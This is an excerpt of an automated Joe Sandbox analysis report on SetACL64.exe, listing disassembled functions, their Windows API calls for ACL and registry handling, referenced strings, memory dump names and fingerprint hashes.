Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
Instruction ID: d421cb50a5e101570975d6890cdbb991b73f925726bc7ceccccea42ac5f980dd
Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
Instruction Fuzzy Hash: 04313EB2D18A89C6D770CF10E04067AAAB2FFDA344F201329F78946A54CF7ED485DB10

Function 00007FF68683AAB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00007FF68683AAE9
LocalFree.KERNEL32 ref: 00007FF68683AB87

Strings

asio.system error, xrefs: 00007FF68683AB74

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: asio.system error
API String ID: 1427518018-3828095645
Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
Instruction ID: 9b7d18b85764b15441530728611a28be08abd42dec1d97cbb1d77a1700146f3d
Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
Instruction Fuzzy Hash: 6021A0B2608B95C6F7108B19E9403297BA6FB41BD0F444229DB9D47BE4CF7ED8A1CB50

Function 00007FF68685CE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF68685CEAA
GetLocalTime.KERNEL32 ref: 00007FF68685CED1

Strings

%04d-%02d-%02d %02d-%02d-%02d-%03d, xrefs: 00007FF68685CED7

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseHandleLocalTime
String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
API String ID: 655981579-2017722003
Opcode ID: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
Instruction ID: ccee10826c6dd9bdcd7a2f993900d55631ef3d9d957c505170f7f4d5d078b6fa
Opcode Fuzzy Hash: daa5ccae675e1664e87c3d862e659ce2e173f1fd8162f8e579eca52e1a44dbca
Instruction Fuzzy Hash: 9E31B132A14B81D9E7208F71E8807DC3BB4FF44798F205128EE8967B28DF3996A5D344

Function 00007FF68687A688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_set_errno_from_matherr.LIBCMT ref: 00007FF68687A734
_set_errno_from_matherr.LIBCMT ref: 00007FF68687A748

Strings

exp, xrefs: 00007FF68687A6AF

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _set_errno_from_matherr
String ID: exp
API String ID: 1187470696-113136155
Opcode ID: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
Instruction ID: 59a7c56662fe0585a78ada248211c21d1f01f0b7b7c8dea79e57ac2d99e4c934
Opcode Fuzzy Hash: d9922d9e5b80ecf97583ad5356538061466fbce9c40230637d87b0462a7541d6
Instruction Fuzzy Hash: 8D210CB6B19685CBD760DF28A44026AB2B0FF99740F505539F68DC2B59DE3EE940CF10

Function 00007FF6868780C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6868780FD
LCMapStringW.KERNEL32 ref: 00007FF686878185

Strings

LCMapStringEx, xrefs: 00007FF6868780F1

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
Instruction ID: fbb7a8124e634d47ddc661e267f5e0e0d79930bc8d2f7bf0fe4fd282e72aad5a
Opcode Fuzzy Hash: 87cf0034b0fcd9c54c61c9bab6167fa2d33436d6331be54f9b1c0558e02e15ee
Instruction Fuzzy Hash: B9111F75608B81C6D760CB55F4402AAB7A5FBC9B94F54413AEE8D83B59CF3CD940CB50

Function 00007FF686864C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF686861032), ref: 00007FF686864C5C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF686861032), ref: 00007FF686864CA2

Strings

csm, xrefs: 00007FF686864C8F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
Instruction ID: 509d05affecd9687fde46f332d5fc763d4ccfab1ca4acac19bfc92b72282d869
Opcode Fuzzy Hash: 926c8d61ae619e4cea6d38c76edcc3f0fce93d5721c54efb26694986da39f2c5
Instruction Fuzzy Hash: FF116A72618B8582EB218B15F44426D77A1FF88B94F188238EF8D47768DF3DC865CB00

Function 00007FF686821080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF686821086
GetLastError.KERNEL32 ref: 00007FF686821098

Strings

tss, xrefs: 00007FF6868210CE

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
Instruction ID: a11df8f786bfa0ccf698798408ed79a78af0db7317c593decb86be274f8abf57
Opcode Fuzzy Hash: cd5b0d93fa60f5d47108ff5205c10caaa5c25c736dacc53fbb88ac9913f15d10
Instruction Fuzzy Hash: 6D01D6A1E58647C2E610AB34E84507823B0BF98314FA00238DB5DC27F1DE7EED05C720

Function 00007FF686821300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF686821306
GetLastError.KERNEL32 ref: 00007FF686821318

Strings

tss, xrefs: 00007FF68682134E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
Instruction ID: 13c69d378c8c6b7d666bc33ef0b0e86891341237a0e7b1264ce052a9be19e315
Opcode Fuzzy Hash: 1bc407a74f966e2ffa7869833deab5959a39b40ad1bf5c22f53a82972e40eb05
Instruction Fuzzy Hash: 0EF04FB1A08A46C6E7209B24E99407963A1BF98354FA00138D79DC2AF5DF7EED04C720

Function 00007FF686877F98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877FC9
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF6868817EE,?,?,?,00007FF6868816E6,?,?,?,00007FF6868837A6), ref: 00007FF686877FE3

Strings

InitializeCriticalSectionEx, xrefs: 00007FF686877FBD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
Instruction ID: 8cd4ffb83508f422bca7aa44c7f5e98c20653e27892896af19983fc19633841f
Opcode Fuzzy Hash: 273a775c745aa4887cae5f520df46ef069811a822fa02b34b0a2512bd747f2e6
Instruction Fuzzy Hash: 31F082A5B09B41D2F7048B52F5404B96321BF88B90F48503EEA4D43B65CF7EEC85C760

Function 00007FF686877E5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877E85
TlsSetValue.KERNEL32(?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686877E9C

Strings

FlsSetValue, xrefs: 00007FF686877E72

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
Instruction ID: e171108f43b51ee5c4df3fa4c0ebc6c02f8155f3e7ecbd11ca202dcd8f25d581
Opcode Fuzzy Hash: 338cb8ce972258a4f0b821b8ea037a51c1abbc8605fb70ebcfd02633c2e470e7
Instruction Fuzzy Hash: 7DE065E6B09646D2EB045B51F4005B82362BF88B80F58403DDA1D86765CF3EDC94C720

Analysis Process: SetACL64.exePID: 5800, Parent PID: 2816COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1736
Total number of Limit Nodes:	56

Executed Functions

Function 00007FF68684BC40 Relevance: 151.2, APIs: 76, Strings: 9, Instructions: 2433COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF68684CF81
GetLastError.KERNEL32 ref: 00007FF68684CF8B
GetAce.ADVAPI32 ref: 00007FF68684CFCA
DeleteAce.ADVAPI32 ref: 00007FF68684CFE4
GetAclInformation.ADVAPI32 ref: 00007FF68684D03D
GetLastError.KERNEL32 ref: 00007FF68684D047
GetLastError.KERNEL32 ref: 00007FF68684D05B
GetAce.ADVAPI32 ref: 00007FF68684D09A
DeleteAce.ADVAPI32 ref: 00007FF68684D0C8
GetAclInformation.ADVAPI32 ref: 00007FF68684D122
GetLastError.KERNEL32 ref: 00007FF68684D12C
GetAce.ADVAPI32 ref: 00007FF68684D16A
DeleteAce.ADVAPI32 ref: 00007FF68684D188
GetAclInformation.ADVAPI32 ref: 00007FF68684D1E5
GetLastError.KERNEL32 ref: 00007FF68684D1EF
GetAce.ADVAPI32 ref: 00007FF68684D22A
DeleteAce.ADVAPI32 ref: 00007FF68684D258
GetAclInformation.ADVAPI32 ref: 00007FF68684D2CD
GetLastError.KERNEL32 ref: 00007FF68684D2D7
GetAce.ADVAPI32 ref: 00007FF68684D30A
DeleteAce.ADVAPI32 ref: 00007FF68684D330
GetAclInformation.ADVAPI32 ref: 00007FF68684D39E
GetLastError.KERNEL32 ref: 00007FF68684D3A8
IsValidSid.ADVAPI32 ref: 00007FF68684BD43

Part of subcall function 00007FF68685EC20: IsValidSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC37
Part of subcall function 00007FF68685EC20: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC44
Part of subcall function 00007FF68685EC20: CopySid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC68

IsValidSid.ADVAPI32 ref: 00007FF68684BD7C
LocalFree.KERNEL32 ref: 00007FF68684E358
LocalFree.KERNEL32 ref: 00007FF68684E368
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E41F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E425
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E42B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E431
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E437
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E43D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E443
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E449

Part of subcall function 00007FF68683BF60: GetLastError.KERNEL32 ref: 00007FF68683BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E44F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E455
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E461
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E467
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E46D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E479
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E47F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E485
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E491
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E497
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E49D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4CD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E4FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E503
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E509
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E515
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E51B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684E521

Strings

SetEntriesInAcl for SACL of <, xrefs: 00007FF68684DC91
Omitting ACL of: <, xrefs: 00007FF68684C138
> because a filter keyword matched., xrefs: 00007FF68684C152
Processing ACL of: <, xrefs: 00007FF68684C35C
Write2SD, xrefs: 00007FF68684C1AF, 00007FF68684C3D8, 00007FF68684C924, 00007FF68684CBB1, 00007FF68684DA4E, 00007FF68684DD20, 00007FF68684E16E
Writing SD to <, xrefs: 00007FF68684E0DD
SetEntriesInAcl for DACL of <, xrefs: 00007FF68684D9BF
Reading the SD from <, xrefs: 00007FF68684C893, 00007FF68684CB20
> failed with: , xrefs: 00007FF68684C8AD, 00007FF68684CB3A, 00007FF68684D9D7, 00007FF68684DCA9, 00007FF68684E0F7

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
API String ID: 3366768055-1688761767
Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction ID: 6d925ab288e5e114c3f70b8b71343917f812444a879e869c0a8dac5510dd36b1
Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
Instruction Fuzzy Hash: 5F33C1B2A18782C5EB208F25D8483FD23A5FF44798F405139DA5D87AE9DF79E984C720

Function 00007FF68684A350 Relevance: 54.2, APIs: 16, Strings: 14, Instructions: 1740registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF68684B36E
SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00007FF68684B461
RegConnectRegistryW.ADVAPI32 ref: 00007FF68684B530
RegOpenKeyExW.KERNELBASE ref: 00007FF68684B57A
RegCreateKeyExW.KERNELBASE ref: 00007FF68684B5D7
RegCloseKey.ADVAPI32 ref: 00007FF68684B66A
RegCloseKey.ADVAPI32 ref: 00007FF68684B68E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684B6FE
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B913
RegCloseKey.ADVAPI32 ref: 00007FF68684B935
RegCloseKey.ADVAPI32 ref: 00007FF68684B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC33

Strings

users, xrefs: 00007FF68684AE38, 00007FF68684AF9F
hkey_classes_root, xrefs: 00007FF68684B139
hkey_local_machine, xrefs: 00007FF68684A8F8
classes_root, xrefs: 00007FF68684B256, 00007FF68684B363
hkey_users, xrefs: 00007FF68684AD15
hku, xrefs: 00007FF68684ABF5
hkey_current_user, xrefs: 00007FF68684B3C9
RegKeyFixPathAndOpen, xrefs: 00007FF68684B610
Unintentionally the following registry key was created: <, xrefs: 00007FF68684B5E9
hklm, xrefs: 00007FF68684A7D8
current_user, xrefs: 00007FF68684B3F6, 00007FF68684B456
hkcu, xrefs: 00007FF68684B39A
machine, xrefs: 00007FF68684AA18, 00007FF68684AB7F
hkcr, xrefs: 00007FF68684B012

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
API String ID: 2754268630-3593729730
Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
Instruction ID: f41443ad83dc2b942af6477adcf1c35fbf48749d131eb586d42823c96d2cc871
Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
Instruction Fuzzy Hash: C2F2B0A2B09B52C5EB20DB65D4402BD33A5FF84B88F444139DA4D977A9EFBED844C360

Function 00007FF686856B2A Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 609registryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF686856CF4
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF686856D6D
GetLastError.KERNEL32 ref: 00007FF686856D8E
GetKernelObjectSecurity.ADVAPI32 ref: 00007FF686856E07
CloseHandle.KERNEL32 ref: 00007FF686856E30
RegCloseKey.ADVAPI32 ref: 00007FF686856E43
GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF686856F15
MakeAbsoluteSD.ADVAPI32 ref: 00007FF686857021
GetLastError.KERNEL32 ref: 00007FF686857027
GetLastError.KERNEL32 ref: 00007FF686857032
MakeAbsoluteSD.ADVAPI32 ref: 00007FF6868571D8
IsValidSid.ADVAPI32 ref: 00007FF6868571E9
IsValidSid.ADVAPI32 ref: 00007FF68685721B
LocalFree.KERNEL32 ref: 00007FF68685724F
IsValidSecurityDescriptor.ADVAPI32 ref: 00007FF68685726F
GetLastError.KERNEL32 ref: 00007FF686857347
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685743A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857440
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857446
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685744C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686857452

Strings

SeSecurityPrivilege, xrefs: 00007FF686856B73

Memory Dump Source

Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
